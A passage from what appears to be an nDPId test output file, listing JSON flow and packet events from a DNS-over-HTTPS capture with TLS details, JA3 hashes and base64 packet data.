RVUAXu9xkbB0O3nyNloM3\/1BpKJAhKkuU\/V2kkZGB6Ql\/kS7sAxcWh603OAJFGoXqcwc2spjFNCK4ea9Hs8PmACV\/UTaJ7lrlVw2HKBfFrLZE4S2HECqocWhjyVs89\/VZtJDOJu7pXlvP6vYnAZ+sKU9FZHgQ29hFtZTpOUnFJKyIZ7qR3IrvVPATpVytUzMEEVKArnVXT6TYqqci\/q+Ob0fbpe70cziyO7QaX7DT+VhBEhzijRbBVrFLadSpyh0XwKqeuShTd5lBEg4jq+0xz6QU3AR+JKO5yFNIu3wqn66JM48D8VfHh\/P6zoK25bt+h0uyMx2Tdvz0o8sXcXOlNbkjxJTj+b3L48sroz1OixQLEwkGWR0YALDiDYZDaGEdLMJeKpDENsvWGjQzbcLGtxojF3IPZE5plenMHHam99lQcz7tOMhTuD0tu9K1ubLwoOk+K9ZSx+jQ\/y8OgEHvmzPhQqCD3uYFzKXprY15BXYSgVl4JkFtCc53KhrIqQpwfu8AGb8d7NaM+YwOO8C5+0rvVtZQVjay20f9c8RH+m7E+z6+gghCL2zO42Qf0EGAmfsmAKXMp6WNxCrd7mkU+MupYWwFGBmLvHH3Vl5XVJZL0bTZyhceC5c2NC8KJ3G3fmI41pUyCIqBiCF4naOVVb20hz4J7t7d4+3vNMlh9pkutkDtBUG\/sopbYKTD6kxhRU0nbMYNcJYsotavdtxk+5ricax8dlXTEQUyVGuU7VzQro6ZTS2J\/N+Dqw0JjCzhzZM4Iy+Zigsyz452Mxwn4H+POZW9AEa8UJIqsMXNYUOgxqdRZORU8gjSaaYtyhn4ZgPLYzJWev+UYEVbkQQlIs0qMsnDALKCKs\/vPLbMaZzLaWAeXOQBcQn6dRdSl1OHdjVYou9K0wNLFmi57+vod9Ufwp9xSCvh3ThgMiLBs9ntZ+DKnnpNK7K++8wDuLBmnbcYEnUZrZqGa8EXM5oLFPSizN87UN+K45Q\/S\/mtl3uxWe3MQN2DDd0vZIT\/pM6xA4vmgKQKhOGh1G\/LsJ4bGVvyfPbVWvvPsPMrkNeqwnVRFRE+JcuPLjNn3DyJRPv6SImnNR3F3p3NDu+U\/bZYbpfAqdtebmwkI6E92\/4EaRwnMS8jUU+nm4J3KxRiQRAHf2ic3MpHIJFU1alZ3UsqHJ6ixFmoZGKJNMub9RVwhhoMDob7lsWG2+BH4aWefcCL1wBXs4NIWJsY2Ws638ztVCok6ObVcpsMJe2l2ribLtt6uLyB1eEKfooGXoxgtbiHn8UI8BDgLRXpCnA7qK7wNCPv\/hXV\/5qObuA7HW\/C2qkSIpV\/R39i9wwVQ1ug1QIQz\/Ivm\/r6WLd0npdZrGVu5GBOJgUSRjnZQS5nqzdQ7xc5efsR5ICHi2XulsD+Zl3WQXVxYViEQMZNQRJCVpPIcx8YSgUINm5M6giDWQvYaHGMiifN+4pLOGo7UDtXSoYcIPou4kTo7mt5yFzAggk8EG0TmExkKN5uy8guvzoGiu3UmP1ayFSZA5TF4Hxgcg+2NpMUwTAvYDD0pW884S8fOW9HXDNECKzwG\/oVVn5NMUQqNCBUKpIkrq4caPrR60LP1G1fKKVz2Mf14oxUS6BYWLwcRFuY6LigPfz3Ch2bE\/jL+itDz+psExENk+g1PfaK4go+YhsmYCnhhZtTocVAIm+qVANsaIE47+Mr\/3qaOf1rseYxdMsxv04vxWH70UAraH7Y4AGe1DhKm55YgPg2VNLv+h443L3JtfuQRH1c2k3TEXhdwCAcDQH9W699eTwV8ntiQTxjZssTXuxQRFgjLr00HeNPNF7n2H9VgT8LsXQAt4\/i29eoQanjq3bUca84pwERHpxJCf8pS1a1KaFzMXvwUcJQOHW0Q\/N1pQGzvCpgH08Dx9GmHQ9KyzJ\/25WSu25QUZfal6F7L79g8iREwvmDUfy2lEv7mGnvWdhk02quVGsRpK
9JEZQWo1rmsoDlNw4F7rXwD7R+U4RUfRyKkcbXPHiTg6YeMzcydsycniM9RaMjPPob9n1bk26ufx+9SlvlwwzqBTbOelsik5jIa525vbi5OIQxSrn0plookRa9xUJNwJ0omdn9j\/AW9IsSa86jM4scUrSMFbeKS4NfQDG9J4VYxzdoR7UNco77sa40\/zPWSa52BjRajNWVVhLj2o4JJQ1TdUu1\/Y89xmSzFKfGWeLSDj5A40mFHXGu4ywpzLC8Nndnau8G5aFKzcr\/e\/FYXUsoYZybTLRRgFBh9CldD2TTFeVueuq98o4ZVu+q1YYgsJKBwBBdV7ZQvj9\/cuG60fpzaNEiWJubkXSKKJvv74KXiPSXeDhQYLSS52OcrIzafNPniFrdcohvXMGEBoTJqcVbFo3+5iC13wm4mlmo+quy\/l2iSqCs4wxDhhSbLnO3Mj4Jo+xpM+BWcGCqCQkZM3XVKq9YiLnmUpBqToMdPk8pxszpPKZj1LhkprcBdvtCOBdOnwV08YRjPbT04P1DuRJXM7LDfWyxwk\/Is8GGMA1w6+\/RlaDUJ4QA8kKf62dGdodCfjoiQVkcxdXgak+xv+ho1izHEaG3Cxi3\/0JNNkwi2GYgruxc5fmKOdC4sqtkxC8j7I10mTh3+xdhudUBx0Sfr8yXq66S2KI88KrN3whtG4+sfGtAkvxG1DDMgti4zkfemFnlOATAqP5VRZM6U99yi4VhRBfczJTw1gBFetM1BkbvErs0YQl2nnzhNtTGtufXl2uHH4oKan\/xnak8wRRzvD04JQK431fn3TEvjjqMfQgcgW2JNC7Jyw7AYjY5nB5jUcAvogHpO11F1M9vRMop+cLQefP6yxy73IHNujTUtW4L99fDdjHVHLSrb7JdVLoGFBt3fFHLJFZwGyi73KaVuA8iLogqAdT6WIlJVQpMEOX0IGn7EhGzmKBzxPYnYlqqEBMEmrbIy10AsTQseVjaAzuWns\/HCPxtq5uB5ayh6r0SQlamctp8CNeSGkejLyD9InFUv\/cN6jEeAPw9ln90Uo+NcJcsUJLeRD+0uBhQVWKlzlgFrsdNHfyZgldWogT0yc5biAQ0YsfjTotPSED4mJ044\/CPZYxO\/WG1WatWJcgbBPZpTJOczqp0KaqRJnQpbibu0vaCcUf\/KqPXTh9mQWbhQvkie6BJSQGOWuxP4jMOKd9ZpnBr0kUhcDeMAPaBISZnWKXpcStlkCGJnAAKL5CAgF\/30XUkXB1LxIrTS74Ar8WfurKCvwBWG\/WZugVENhYI47kxJo12a6YH"} +00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304432,"flow_last_seen":946739304474,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3202,"flow_avg_l4_payload_len":1601,"midstream":1,"thread_ts_msec":946739304474,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":946739304474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":892,"pkt_l4_len":858,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAANu8ZFAADUG\/LG5X9oqCgAAAQG7xbYrbTJIao0RxFAYAfWPbQAAW0wo1H0j139pBXgBmTX+NlnQSaFEq5K3Pk3KVeGnXpOOLq4X08kQBuG8lGioiVe9QPOeM1XWvGxPlasRKFYrXBH86PGVaXAalDOEWJlV3PHRUUevw5fI6G+9XzuHkGZKTzPpIIOZ3iAzfHnVG3aTpqTBf7xHcc9kM1a8UHbmE4vJrXG9wa2HwWF2bcpsRjUYBUQxiid3MXG7FbSTEXHjqgO4LQdR6Xrrbq+Co3CdY49hyuqnRUiglv3ZkZvp\/BcnFskV9iJiOLBUK+jpAhnIdIbviFi78T5PQD4Tbyt8STzKJ4\/mkCRReunmywmmxKyYx8ErZcAkoKDR9IOJ3LCf8I8uzSUCcTKeSSnHS6ASYLDpWersQuLDgg3Is5Hb+2kMH37wQnKetidHgJqxmhLBaw+NX16ETkRc5vqPLeAmNQjzUjFZW029RGYPrEM\/M2aIcKp372plYpuhFsySXWIydCD9tqNCwZyquQ9nS3XV\/M4rQP8eJtxF8c+LbyHgf4cpoHUgBE4Qg\/rQ8QPjUfA1pwRPb\/2owpEEJi4RutXWP+JydB0D0ebOUJIyGUMSTIpJcFH2AKhLGUYE6NfckNeCzln4nEp2+qOXsbfMejtOZFyyhHVzHpRSbGA51CkajxcDAwEZGvKJBQnU\/r0Z9hIPhFlH3EC+7xZqS+s7+uQ2E96CDW5iU++SeFvwmMtUyG5rZZUMcBGpLzGamrlpIcWB85XVCU4gt4ssg9\/BdLmFwKiGqbmqVBGWt\/8gKtXdyHqS9eDrvNFNLvTrsxnC0XEzuTedB4Vu4WIaC7MUadYnyNgpkYSxjxFL6J71Xhm+92aoteroJN4zzFxDDd8rAkDnu1z+ZiBNnpB\/Gl8e1OMkCP6vsWHqZoCX9H9vn8tgHDIFyxXWqZDdxctsoUH7QrryxeYlvn1njblpv3w6tKj8ghJZAtQ3ko6UuvntUQvQpT48C+AbzDC+CMGpscAjbO2LKlP9fB1a9O37Dse31zOmm1FlQiiQCvlL1EpsgdEXAwMARSV8NSHQ2Cma7zLl9Np9i8ttiytzR2iGli71aKFmLcmNdXIXIfvH2D8Tx5IjanqSAuAMgykIOqh1u3rHE4swCwSQXoiMxQ=="} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946739304846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739304846,"pkt":"REREREREZmZmZmZmCABFAAFKCqJAAL0GKn8KAAABM56TMtqaAbsV\/EiYhf03fVAYAfaIyQAAFgMBAR0BAAEZAwMDM0zFcZBVaq8jarHhMnn706tDCSlU6qIcSdmbVQbksCDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUcmVzb2x2ZXItZXUubGVsdXguZmkABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgp73dM21LptFd0ThW7be4\/uwlUqgVJQtqqMQYrFbmEGQ="} 
+00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946739304885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3185,"pkt_l4_len":3151,"thread_ts_msec":946739304885,"pkt":"ZmZmZmZmRERERERECABFAAxjgA1AADcGL\/sznpMyCgAAAQG72pqF\/Td9FfxJulAYAfWT4gAAFgMDAHoCAAB2AwOQkeJmPgfI+2\/Nb2YFPwnrh6xqnBenx5u8q1ZnyWqFbyDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76BMBAAAuACsAAgMEADMAJAAdACAildRAk\/Ii9q568Shy0jK1lY4Sb1nfErCeFDdP5ao6KBQDAwABARcDAwAkQtxzjO6Y1fKC\/+pxVLm\/ix+V3OPJ68RUn+6KLdAjN0rm7jqVFwMDCjCAB4dDMRsvk08LXpiehq\/g9vbt8WAZZyX0IwUW7zm2s2JxksqGXN7MA4aQXMsXbea79jo4WvO3p6dz8ckR6\/GSVEFX2o1gGE3SmFE8bI1yIk7FWs3aYgxYwqLKQEvbN1ogdjJ6GVf+z5kiMwtt12G5tdTf7rSfZ3NH6Yk4oM8Elpl9VtGpp2o0FPfY8QB0bMd4GPEVRd4k3sqTgevSs5A\/CC4vXXDNw8uBoNAhPcBJ041jkXgJVSYm9QwFsJI4LdQTSOvpWGu8g3Q7\/FqYiPFofKEmMJ\/qdjv4rC472QK9MBOUQREh1M+X1zwZya0Ac0YwCKyp0B6QV8x8ZfPc4YWcPVw\/CzcsYjigSbp5JV0L4gyAue9
Gh6S3YYS9bSWcQ6OYfhcUgIVrottiHisZ3rFZLnhHY2SXkUzy2eOnD3Qi87\/nZ2OjGdHVYvM8Yu4DBGax+k0RD3dyn9+WKeU6QKdkf0bt\/mxpZ+gCW+joqGHWhH8T8mliVYu97Vp1QkdwgpRB7hXYN0Y6CGFsBPw4pzAHjVBFBgDGgx3FLp+jHtYGS4QJXS1JHRsP\/ek1Bjr6PmHXQaaRrJ7LWjgQKI7Gha0EZqsq38SOF+eicMwDFpzc3B+5eNIjmjJW4NSel0FytKTt9ojc0NWkn0EYaG0EgY6+6x2nvzg5YX9tM13wZT\/oz2Ot9pPHCaabuHca2dbfesbpNetZkot4ox97XYVrqgngmst1PfSQmtM98M5ptnPmd\/sO4Q2zmY5zCyE4gqZJ\/jBMttfXco2\/5avcH7mX5ejSI27aNnLJexzSKXQ+JaOKITzvIhr9MApYef8a6mxmBG7KvaOHtWpBt2xvsdwkyGKaTSFivERAQJ3qVVpBnDVBNegKy8yEp45YgbraKILphly37eCzmeR8+BDQHM0\/olAhROBUZh\/RONZXvUkl5SKTRjHC2xvJNaeZYZ+hmdzytY6JxtjOWIkXJWGOQ1NLnp8ApIWyE\/uNNjzCwSksu7oipiMjp9\/TYKv3dTCD+5Ol7BQVVV99RWf0LzZ8iQzJsQx4OWgFzyT+Rx7ZVNnTGOrqRbAycjVipQHP7zlio12QWc9UNzJCxesOye7ivdDzyOxpzywnD3v8hSp\/9zPmf\/3ENHJgy8O34UUO06MOahgiokayYgWdjmVbemjxT1TryYu0gDna\/E6EV3qm9EmJk3uwiz6F8MD8T978R+EclF8jScCvS+0rc0myMoeeGSKvHZ59\/bY\/8uMlpK\/glxn4tf2FrEjMiwTYfD\/iCofxemvMkvC\/JJfgLtIuT4eRwYnzHY6tx9RKYdE3USzn4\/mm5qo5iJNIvjNV0kDlflg2at\/H0LoUPuAQDzKEIijJENcZ6pth1tAfPuzZbqzQybao7+N7tXszvfJs6XQ8U0IN8EKUruqqe63LmjAuODDmoGi5l1XKUHloz2N6Z0c6GOIMVwe3VD3oKEzis5\/IqukPTBIlPi3wM9hPvIjDsgqHeQuZwd0P2uGkmxxX+CQ\/eHLZcMkC6yXGIsoms\/DqqMmKImF+\/kg3KVbsOWynlp+qs+GRnuEe5Gwcck3bNanvNfRO2hnDlR3xxWpDeCDtY554dnKSdrEsmz56E3HZY7CS4xffa2qaRU9o8FE6oWceQ2YomJuE\/bMT3knxqniPrzl1K3GkigMh9J1i47zylUFJIasxWeeT4rnsrPdwO5pPpDZPDAhZZKqamf0Xxf7UyzOur5bQ0RGdSbDmjCGZUxwrcQgCzOocJ07C3y9f5\/cPHLy4Hcpi9nKHy5+zMgLxDuHh45d7g5aX2opBYeDFdZVkS35fhN\/VA5YDY3hjQkRRPMbthZpOOEiiUTiyQGuttf7SmNH1qqd0+P4R98lk6wmtu\/RYPzzoAOrY33Oweyfv45FrUJjxFb3dkB2JJBL+a3b7QXiEHk+jfi2DFJC8R1nDmEiD7lG0zp+GgCp2hMKrzTinc3jq7XrvSXgjRArW5vMll4UVtkgCZOG8JOPCJ+1InS6ZkzsHBlVE1ulhcQ6O07QOIetMX\/TQcpOws1Y3zI6xlDo7QN9RXjghTw1OQy\/e7csIpoqCDP+zQIn4uVNd9knXoZalNv0Vl+aMYpSUZU7SqXuPd5TrgUjyDCp5uSeJ7PvFxTrvq2m\/J4PCA00dz61blph4TnR5jqkjnWkPCWysgjmFP6jSXDVhi7OEYKJ3O5rj9s1KlWrTAKqEQ1WqkKpYs5zhjZX8C2jJXc7kR7CLzfiUXF\/NgCKD1oPTUZ3B8\/5yhnRignY4ZXMdGmmpuO\/YtIw9z3hTG2mvGzyDH+lTissPE7qvJQZpSJa3YSyfqgptZgRRY3rqQwM1
Uan0WZB\/VyeZi71E8HGjmCdytjr1tbuT47siLcnpw\/tnXbVcW0DRQa0UluCuUeRWsFfgTuUhjuWHPeilVqW8TKVGxmd00ikgPoQa60hulHvmRZ5KO6vzi71RXX6dL\/wcA9t7hqc08oZMCG7pFOGbkwZ0H2Ou1cGKyFuTh2P28nKV1VsXeJy03j0rMepvwRePH7BjQM109D5zTvZ+x9U7LeeU5p\/97XLGVSvHyU6QoAkvI7FvvpHkTyoqhk2wuau1Ks3W6ziSuG5ItHrlZeoz2vdhzoVB+PdecdxLzV339b9A3nHa+rng\/3RfrU7m\/xV1uGOltE\/q6T8zbMwllfgMWQHWJtalokkS691O3vXWaxSb0GH3Eukn2GTLqT7xyn8hsg3I5F5pOCMspm6GHKCedNXQt\/rOrbG+70oNkLEiqOTucHrzdm7u3q9vZm5H7InHwwhmYB9o+wmMx9CpSsan17Eu6kQzONsC+k776iKm10F9TFCFRzcFvoSkJVRCogWUna5X6unZPh90yhZj+joK9OmDYl3uGf3cxeeYhuWr7BFipgMV88P5BfhbMuQJTiRkmE2tdVLKXiJJMT3RIuLttxViwKIZxqrsBPVZWuFgeoB\/tNKx1MPoFMSkd6Ady\/JPiKCd\/Lo+LSa+EGciXu3JhsD37LOO\/iaE1hxwYGWesFtcRBD82I4gt\/VZ4IZMSaNKHgm65E6lCcq41BJ\/gbuCDCFJ47l5UE8QhYSOHmp5J9j5vA1FjZFm5Iv6VRZaegnWKKRCmp+e5pBYWdf4T92iFA3wkmAojnbzcZPXM1FL7vahyaLx6fEfTzbYntPyfIJ2l5KJE855FQl1WRsib7X80Yvtknk5W4cHEv1yr1kjUU2CGJ8WMhJhi5rps9ncDKvd4PP0dTrH0ia8H78o1K4OYwHp0nPI0tpDBJqSO906qPhy7pON78NLR8NLi7ebyinTbjqYrIeAPW0BcPQXfo+ePTRQEGlW7G5LCAYlQCvO5j\/LMgF9c3iJwt3nUbOE+eqHvK0\/PHJmQK+ijLfXFLdBd6NBQSn3sHF\/qzgQRE5VwfSRmK55bFmg0PCiTnhGTWzfK0OvOvyyAAiwvXCaBV+gFnzKnwwQ+4ebBmLMgQpqYGGOrzwhV7P+RvbAFwMDARmYqpARsWX06T7\/aIqUa3gqpszdt6QdkNXpjrjP\/CtX9C+2AHbAmlDaq+eynMum8sDVzFoKFvQfGpt91s0+c4BcfaWSQDicP6abNOaMq+Hp75lMfIATEOyO9cUpGtsxdjbO98fR3ligfvynTicYTBBKOabjGzsvGqpIQNsc6yP7ec1DM5IvytEF3WMD\/BSWfSyCMBkPc77J1iCDteQqYtaAe0whPDVMG6GGDORujY8TM3L19IZL3YvYjw7AjSCmeKp+dThVSFL7D\/ks2Bt12v6Pc4J\/bL1kxAzO4vYx1vazs5rxcAfFBrI00UuE4UKrW1AuFrQrWAmy8gFVgJ7l+nCzCeDoyrV14OgMNuqUXIpirZiejq2fhnoXshcDAwA1MiDkD+m6EfUtBdx\/Pyl0ehgKaB76+ayZoBt6uEP7tnUDn+hUUsmcN7NZ1IZhFxhyx2uKd6w="} 
+00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304846,"flow_last_seen":946739304885,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":3421,"flow_avg_l4_payload_len":1710,"midstream":1,"thread_ts_msec":946739304885,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946739304887,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739304887,"pkt":"REREREREZmZmZmZmCABFAABoCqRAAL0GK18KAAABM56TMtqaAbsV\/Em6hf1DuFAYAfWH5wAAFAMDAAEBFwMDADVGrMk33Jx9u4V9oT8gk9T3N9siooKVMszOs96zlvjMst5cKF\/6mDE\/X3tfb1uyKq+NLUpVEQ=="} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946739305016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739305016,"pkt":"REREREREZmZmZmZmCABFAAFIJYRAAL0Ggi8KAAABuf2aQugMAbv\/W2fgE34PaFAYAfYWNwAAFgMBARsBAAEXAwO7rF9fivBYq0PPnnVftpI5xv63Wth8iDXYIbCI66xBbCCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zZXMuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIHdlaU8VTQtoxOo631cPtMLo1fhD\/NP8\/WHh2FCfWmp6"} 
+00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946739305061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739305061,"pkt":"ZmZmZmZmRERERERECABFAAuA+UlAADkGKDK5\/ZpCCgAAAQG76AwTfg9o\/1tpAFAQAIMgbwAAFgMDAHoCAAB2AwNWoPreEkJ\/UPiZCRV0IEx6jRSqugqY3M+B37V87ydZxyCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jBMBAAAuADMAJAAdACB0RVn8jGqUM9fyfUTkTuhvHxWfPva1vJ9a18\/+TyUNbgArAAIDBBQDAwABARcDAwteuwCVRbAjw9pKtY4dNJzB+NkDPzUPU\/YSrAhwNpHIEK5V+o2\/HqZHUFxtVJbEBPgURU0pRFWa9dL9lQp8LuDwWHwDq1H1B4wIu6Cjn5BK872nUeQltRw5+FbrO5MDeZZJRgg48HKHnsK1mBHQnXLVwFvBE\/e\/UwSrANn9vg+B6zkss+nwjnEuw1XfKHcjr3B+gq7Tt\/pkx\/SEVt9DDhoVQjkT+nj8Ch6uFvKMxBfoNlGXQAfQ76Cfus9zBAZT5EY1YHp8kypEbWJsqWobkhk3j7efutg\/+7i\/\/3hwY3S4DA+PZFxsrSsM6AIVwaJ95fOH1dRdOyCRxbfVQ1s5uNDJcA7OdsaNR8VQ06UA5uK3FnFY9IaeCSIuzswKtKKP\/cTlEabfxoFlZbInteiv8UhvUx14oYH8877iKbTHau
ga0SrPYwJ3hDQ38FuPBJ16hIcickFsAxoIxHcrJTcDxD31\/+27P70ucqJUKNnKmwnMS5iCjU275dZeWQ9Zr0T4s7GAOpJ\/qhuQ0adCzilfe+zxessB1BHzKqNpomqUeAJU6wiiIZGwIQCSR9TnB+R6Furn+4OgUG6PGNdXCZNQ9itsUGoaOah9Fd+b\/mJSMoK\/FuhgIcCIxvGAml0OlSPbxxyIuGAWgYtRBimB3o6JaqY5BlDiRDxZX24w4nNBhNEgZ23H2qCY1hFOw\/NxAIqZ6i1OczcdQK5je4mFGQnk7n2Dd0xCvT\/QbVT+DGwohNzMpmrD81sKP2YRMryNcEXaCYgEk0oi4bjQNtHjwEi3WiSTxdHtROjzPbx1MuktYL6gASggOg1Ub+v8yVRI6bLdeV5Xwvz5ZxoF9vdrBEyvVBdMauaRYoyVnXm15LfrTPUCeXkHS1kWpj909RBaupD8tKI35AMNBM63GiCNIPCKacZOle5IpXYl1uAfPyEf7I7c\/Z2VAGWif0f1eRsudqghQ1VDSbMFMSOUlZF8oqR69Dp+GUrZSkzXH\/vlToVdum7PDCHkza\/W9cBDPI5wtxaPFdq19aD9CF4UXzcnY86h4hX1BAKMl5ymvY9oQmQKwLyZZk7gJ3BG3QSRRkEJLHmElRTA\/j6+UD2DUirljLXPFbrXC2eKn2CCwq3Zuv5P5wO5+t0UU\/yghFoQluNjQ3lfw4zQuwuXqm940OzzyqoEcUuHVR8IXnZ8TZqE90q8rCtGIOP+LD4hWpqBqHuwk66vMcJQgwNCFXix5ZnSXLN0BgV30sQI8N\